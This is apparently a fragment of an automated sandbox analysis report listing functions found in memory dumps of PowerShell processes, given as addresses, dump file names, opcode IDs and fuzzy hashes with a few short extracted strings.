                                                                                                      • Opcode Fuzzy Hash: 2a329a33f23f8c82734cc1e6439698990a84e2e11eab2b6815b9d820f62ce1c3
                                                                                                      • Instruction Fuzzy Hash: 2921C332D4DA874FE3A5DA18965117866E2FF67B90B6901BAC01EC75E6DE2CEC04C241
                                                                                                      Function 00007FF887E043BC Relevance: .1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8b9daf9bbc5ba7b486e2f6a8baab1876da91c601ffcda379a08e4f5451000db
                                                                                                      • Instruction ID: 3e6ead0033ffb17fda42b438c7d294def6013a5becd297f47ebbe26b46d0d709
                                                                                                      • Opcode Fuzzy Hash: b8b9daf9bbc5ba7b486e2f6a8baab1876da91c601ffcda379a08e4f5451000db
                                                                                                      • Instruction Fuzzy Hash: 2411EC32D4E6854FE6A5EA2895505BC7BE1FF43AA075910BAD01DD7897EA2DAC00C341
                                                                                                      Function 00007FF887D333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 00939e82c87dace164199d7fdabe4939007464bef50cb10c5f43c6540cefc411
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: 7501A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3655DA36E882CB42
                                                                                                      Function 00007FF887E03F90 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c40587e08063aaff118fa67055d5959fe85947c3b4dd620162e8e7ee28dd3b5f
                                                                                                      • Instruction ID: 433a9f57ab59cf5f47c8f6f9f7edcf0bd21d229a84f74d458bf996fb6603ec9a
                                                                                                      • Opcode Fuzzy Hash: c40587e08063aaff118fa67055d5959fe85947c3b4dd620162e8e7ee28dd3b5f
                                                                                                      • Instruction Fuzzy Hash: 69E09A31A4C4098FD668EB4CE1409EC73E1FF9A360B2100BAE11EC3922CA3AEC51CB40

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF887D38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                      • API String ID: 0-3225005683
                                                                                                      • Opcode ID: 42e848afd41f9e98cab51089798ecf43228fd8a6561ec69735c08984e7bfe547
                                                                                                      • Instruction ID: 635874a5d90029aad58ff7785026dbc983037610f464485794687ad2c305017e
                                                                                                      • Opcode Fuzzy Hash: 42e848afd41f9e98cab51089798ecf43228fd8a6561ec69735c08984e7bfe547
                                                                                                      • Instruction Fuzzy Hash: 222104B7A081258ED2417BBDB8046ED3740CB962B434592B2D2A98B003EB1864878AF1

                                                                                                      Executed Functions

                                                                                                      Function 00007FF887D29750 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: UAWA
                                                                                                      • API String ID: 0-1492024814
                                                                                                      • Opcode ID: 14dccef942d5ea3906fd9e3db11afcfe24db773817a0fa235a7cdedd571f2314
                                                                                                      • Instruction ID: 0eff942d5994aa95aa6bc4d6685716528dc53f32af51a32980dfe28bad8be7be
                                                                                                      • Opcode Fuzzy Hash: 14dccef942d5ea3906fd9e3db11afcfe24db773817a0fa235a7cdedd571f2314
                                                                                                      • Instruction Fuzzy Hash: 4F410B3191CB888FD7199F5CAC066A9BBF0FB55710F04426FD45AD3296CA24B856CBC2
                                                                                                      Function 00007FF887DF6605 Relevance: .4, Instructions: 432COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a9b955dc3538bbbca6cd1befce1bc7d9d4583cc9bc6cbf2636822a31551c8b54
                                                                                                      • Instruction ID: f47cc7d3be0382db735e52de9a028b9dde16636e1d35849cfdb4e1240260f366
                                                                                                      • Opcode Fuzzy Hash: a9b955dc3538bbbca6cd1befce1bc7d9d4583cc9bc6cbf2636822a31551c8b54
                                                                                                      • Instruction Fuzzy Hash: 16D13331D4DACA8FE7A59B6898155B97BF0FF16390B0802FED44ECB4D7DA18A805C342
                                                                                                      Function 00007FF887DF4073 Relevance: .2, Instructions: 185COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 58a937657f3a02451ad1bb88b1f7fff27cac311a8684986414d217958a54b1e6
                                                                                                      • Instruction ID: 7780a45cccb7a34d735792b641adc69cefa8951044c2f25712590641e714f812
                                                                                                      • Opcode Fuzzy Hash: 58a937657f3a02451ad1bb88b1f7fff27cac311a8684986414d217958a54b1e6
                                                                                                      • Instruction Fuzzy Hash: 3F51E632E4CE864FE7999A2C945167877E2FF95260B2802BEC10FD719BDE19EC05C351
                                                                                                      Function 00007FF887DF4370 Relevance: .1, Instructions: 147COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7ed825bd7719a72e566770f4126d6184c5c17715b3461c1b5d78016dc94c3a74
                                                                                                      • Instruction ID: 5603f02e9e6f6edccb763b9075bb7235c37639c38943970d4b7335916cd758ba
                                                                                                      • Opcode Fuzzy Hash: 7ed825bd7719a72e566770f4126d6184c5c17715b3461c1b5d78016dc94c3a74
                                                                                                      • Instruction Fuzzy Hash: 06414C32E8CA894FE7A5D76C94106BC77E1FF453A0B0802BAC05EE718BEA19AC14C341
                                                                                                      Function 00007FF887C0ED40 Relevance: .1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1567647819.00007FF887C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C0D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887c0d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 33b82652472d780ed20b8724d1b541b0e6afd55060425744e1ac572deb935766
                                                                                                      • Instruction ID: cfb7585e26b1ed6625ea78139b7ab22e8e6ecf198754b22ab8ff3d2f9abe199d
                                                                                                      • Opcode Fuzzy Hash: 33b82652472d780ed20b8724d1b541b0e6afd55060425744e1ac572deb935766
                                                                                                      • Instruction Fuzzy Hash: F641117184DBC44FE7569B28D845A523FF1FF53360B1906DFD088CB1A3D629A84AC7A2
                                                                                                      Function 00007FF887D2A49C Relevance: .1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b797597b1eb47c62776e6af23a8afee41303b7b3f29ff34ff4f19ce5b899e21a
                                                                                                      • Instruction ID: bba4d18c068f44641c79d89d16c10797a5e7023b4ea999c663ce6c6da04f5c91
                                                                                                      • Opcode Fuzzy Hash: b797597b1eb47c62776e6af23a8afee41303b7b3f29ff34ff4f19ce5b899e21a
                                                                                                      • Instruction Fuzzy Hash: 24212B3190C74C4FDB59DB6C984A7E97FF0EB96320F04426FD449C3156DA74A846CB92
                                                                                                      Function 00007FF887DF40BF Relevance: .1, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ff07e796592d432b45cfa1e712ba00fc1d7f8abf7b4be8f46f4be1df1adb268
                                                                                                      • Instruction ID: 4c41af0acd411ea7304051df8e82283e96aef8222190b8763701215627094b06
                                                                                                      • Opcode Fuzzy Hash: 0ff07e796592d432b45cfa1e712ba00fc1d7f8abf7b4be8f46f4be1df1adb268
                                                                                                      • Instruction Fuzzy Hash: 9A219132E4DE864FF3A9DB1C945117866E2FF65390B6902BAC01FE71ABDE18DC44C251
                                                                                                      Function 00007FF887DF43BC Relevance: .1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05c6090ab7b4ff1b2d85518873fa2db63e27e1f5acb51df00b210ee0d628b256
                                                                                                      • Instruction ID: a3aa5ef4527e8569930711755993f912fbf59a5ee64efa92f23adf82548159ad
                                                                                                      • Opcode Fuzzy Hash: 05c6090ab7b4ff1b2d85518873fa2db63e27e1f5acb51df00b210ee0d628b256
                                                                                                      • Instruction Fuzzy Hash: 1A112532D8D5854FE7A5E72894505BC77F1FF402A075902FAC41EE719BDA19AC44C341
                                                                                                      Function 00007FF887D233B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: ca7c1ec659b9d5d66912b6f2aa4395e217a420b6faa3559ab1425feb945c1899
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 8101677115CB0C4FD744EF0CE451AA9B7E0FB95364F10056DE58AC3665DA36E882CB46
                                                                                                      Function 00007FF887D2A0FB Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23ba0bf10e5b80141f8455d0ca4ec8c8f6a29645d5d9ff11d122309888ea5ecf
                                                                                                      • Instruction ID: 4323da222518d1f5a47f1e41075e06e97cd60def85635519eb5d1135a44b5c78
                                                                                                      • Opcode Fuzzy Hash: 23ba0bf10e5b80141f8455d0ca4ec8c8f6a29645d5d9ff11d122309888ea5ecf
                                                                                                      • Instruction Fuzzy Hash: E9F0FC76A9998C4FD743DF1CDC550E87FA0FFE5211B0402A7D809C7052FA255816C7C1

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF887D28BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: M_^4$M_^5$M_^@$M_^N$M_^U$M_^Y
                                                                                                      • API String ID: 0-3990506085
                                                                                                      • Opcode ID: 0f6c3e6c5954c76065486b9d972ee69299aecac023412943f1e424693a7cc32b
                                                                                                      • Instruction ID: 09c352572252b6c098239c821429f0f93a358d74b85d38a35d6af8c131691f16
                                                                                                      • Opcode Fuzzy Hash: 0f6c3e6c5954c76065486b9d972ee69299aecac023412943f1e424693a7cc32b
                                                                                                      • Instruction Fuzzy Hash: EC313B67B08529CA820136BCF8416EC7790DF9637678547F7D1A9CF083ED19348B86E1
                                                                                                      Function 00007FF887D202AD Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d6$@J_$]$p@s$x._
                                                                                                      • API String ID: 0-2524536879
                                                                                                      • Opcode ID: c4417230c153b7bf816b6614510ab5752a6eb3093aab44474522095338d6e622
                                                                                                      • Instruction ID: 0bb4cbc2edf64edf62ff83795431f7aa6ebab671d0449b32afbf01ad6f429c02
                                                                                                      • Opcode Fuzzy Hash: c4417230c153b7bf816b6614510ab5752a6eb3093aab44474522095338d6e622
                                                                                                      • Instruction Fuzzy Hash: 3551F462C9EAC14FF2164AB8281517D6EB1FF52A4079881BBC0994B0DFEA4CBD1AC345
                                                                                                      Function 00007FF887D289F2 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                      • API String ID: 0-679677686
                                                                                                      • Opcode ID: fd93bf6aeb917c60bed8f9183ede6dbcce212740ba3996869701adde282f65ed
                                                                                                      • Instruction ID: 6beff539052d9ea9c7f5e174a9035a17e0587e2e3d105f29892a4914a6b00865
                                                                                                      • Opcode Fuzzy Hash: fd93bf6aeb917c60bed8f9183ede6dbcce212740ba3996869701adde282f65ed
                                                                                                      • Instruction Fuzzy Hash: CB3181A3A5D9D34FE39B822849A50A97FA1FF6229871D43F6C089CF4D7FD186803C151

                                                                                                      Executed Functions

                                                                                                      Function 00007FF887D0AAFA Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: hr
                                                                                                      • API String ID: 0-2122794360
                                                                                                      • Opcode ID: 09d400f721624c6edf50540d3ba21d2262fd3586f3b096393646c1c5b2f9ca5d
                                                                                                      • Instruction ID: 02451c6a73afbf65b7b3e863ef4494a6e8463c7437ad2d24539bc9ccdfe958f1
                                                                                                      • Opcode Fuzzy Hash: 09d400f721624c6edf50540d3ba21d2262fd3586f3b096393646c1c5b2f9ca5d
                                                                                                      • Instruction Fuzzy Hash: 1F714C32A0CB864FD305DB2C98D56E97B60FF92225F0942BBD45D8B183EF18645AC7A1
                                                                                                      Function 00007FF887DD6605 Relevance: .4, Instructions: 433COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 463447f875c86bf608627d855765143d3695e663c692ad0fb7152a83458bd5a1
                                                                                                      • Instruction ID: 05136bb7516ab4f6a6849aefb15a1138c10ed0529a87efc88cb04d05d65c3485
                                                                                                      • Opcode Fuzzy Hash: 463447f875c86bf608627d855765143d3695e663c692ad0fb7152a83458bd5a1
                                                                                                      • Instruction Fuzzy Hash: CED11421D4DACA9FE7659BA848155B97FF1FF16390B0802FEE44EC70D7DA18A805C381
                                                                                                      Function 00007FF887D09EEA Relevance: .3, Instructions: 253COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c1e9bd1c64b858123c81fe3f9d1cf0d1a4dbdd7781fb4290009264ec373dc3a3
                                                                                                      • Instruction ID: a019c9338b7d3663f5bfab39f90f2767be5a4e5979c47653778574d7ddaf9cd1
                                                                                                      • Opcode Fuzzy Hash: c1e9bd1c64b858123c81fe3f9d1cf0d1a4dbdd7781fb4290009264ec373dc3a3
                                                                                                      • Instruction Fuzzy Hash: 5D71F777E4D9964FE343962D9C660ED3B70FFA2265B0802B3C49A8B097FE14581B8691
                                                                                                      Function 00007FF887D0A71C Relevance: .2, Instructions: 179COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b387820537fcc020c723053737dbf66b7abb2be0ac1b7eff7a8da36e0fe2452c
                                                                                                      • Instruction ID: 71fe4a9ce3dec0f72e589edbd0d1ee05e3f9145bf1a450d16ccac8ad38c23a60
                                                                                                      • Opcode Fuzzy Hash: b387820537fcc020c723053737dbf66b7abb2be0ac1b7eff7a8da36e0fe2452c
                                                                                                      • Instruction Fuzzy Hash: 5851233090CB854FD34ADB28C855964BBF0FF96354B1805EED4CAC71A7DA29A847C742
                                                                                                      Function 00007FF887D09FE0 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 631d3acbc35c86244fd645668b4961fd2947b405ff79b35acd47ed16d9b9e073
                                                                                                      • Instruction ID: f1cda100c55a481a5d1695a67bc1dc9762b3ea37d403d908dfe13a658c1e44ae
                                                                                                      • Opcode Fuzzy Hash: 631d3acbc35c86244fd645668b4961fd2947b405ff79b35acd47ed16d9b9e073
                                                                                                      • Instruction Fuzzy Hash: C0412477E48D974EE243962C9C550EC3B70FFE13A2B0802B3C05A9B0DBFB15581B9691
                                                                                                      Function 00007FF887D09738 Relevance: .1, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c201af69dd9eacb02a2bec733d6237fa8947b1639d04f5aa2670ed00fc204454
                                                                                                      • Instruction ID: 753f1542e8ff7fc918043a1ed7958bfe95cf783ee9f1adbba5a828565e671c28
                                                                                                      • Opcode Fuzzy Hash: c201af69dd9eacb02a2bec733d6237fa8947b1639d04f5aa2670ed00fc204454
                                                                                                      • Instruction Fuzzy Hash: 46410A71D0CA488FEB589F5CA80A6FD7BE0FBA5711F40422FE44993256DB20A856C7C2
                                                                                                      Function 00007FF887BEE540 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712072141.00007FF887BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BED000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887bed000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3acb2d3e337ae25234ff2fc3901789e1952fc4fb901c1b9b5255944da5fdc764
                                                                                                      • Instruction ID: 61f45415c10cd6d0c34d50c892d7cbe0c651825852fe16d779ccd835e849623b
                                                                                                      • Opcode Fuzzy Hash: 3acb2d3e337ae25234ff2fc3901789e1952fc4fb901c1b9b5255944da5fdc764
                                                                                                      • Instruction Fuzzy Hash: 5941253140DBC44FE7568B3898419563FF0FF52320F1506EFD088CB2A3D625A84AC7A2
                                                                                                      Function 00007FF887D033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                      • Instruction ID: 52d07649515830b02c27e4596541d7ed9f74d4c37e56c1cb3026905bdc575559
                                                                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                      • Instruction Fuzzy Hash: 8F01677115CB0C4FD744EF0CE451AA9B7E0FB95364F10056DE58AC3655DA36E882CB46
                                                                                                      Function 00007FF887DD414D Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e1e4eb6944613d587957b3b1929ed27bc961a3e89a670bdecada314c2a9c860
                                                                                                      • Instruction ID: 7449f1d2d4501bc745917af1b253de8a2f86b1814d69fe50bc2e29d87887423b
                                                                                                      • Opcode Fuzzy Hash: 9e1e4eb6944613d587957b3b1929ed27bc961a3e89a670bdecada314c2a9c860
                                                                                                      • Instruction Fuzzy Hash: B1F0BE32A4C6448FD698EB8CE8015A877F0FF54360B2500BAE06EC71A7CA2AEC45C751
                                                                                                      Function 00007FF887DD4400 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0e7574c3eb91906f658b085e813a4a5c451982520076ad4aa586a4175409e7e3
                                                                                                      • Instruction ID: a530e1bb594dce351c66b666605534aa37d11e6767dcc86943a3101dd677ff5a
                                                                                                      • Opcode Fuzzy Hash: 0e7574c3eb91906f658b085e813a4a5c451982520076ad4aa586a4175409e7e3
                                                                                                      • Instruction Fuzzy Hash: C0F0BE31A8C5488FD794EA8CE4595A877F0FF0432071500B6E45AC7067DA2AAC95C740
                                                                                                      Function 00007FF887DD41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 16fc3ff5604b0b436fe1dd69d646a73ea909bafb470d101bfd4f32b01d0daa5c
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
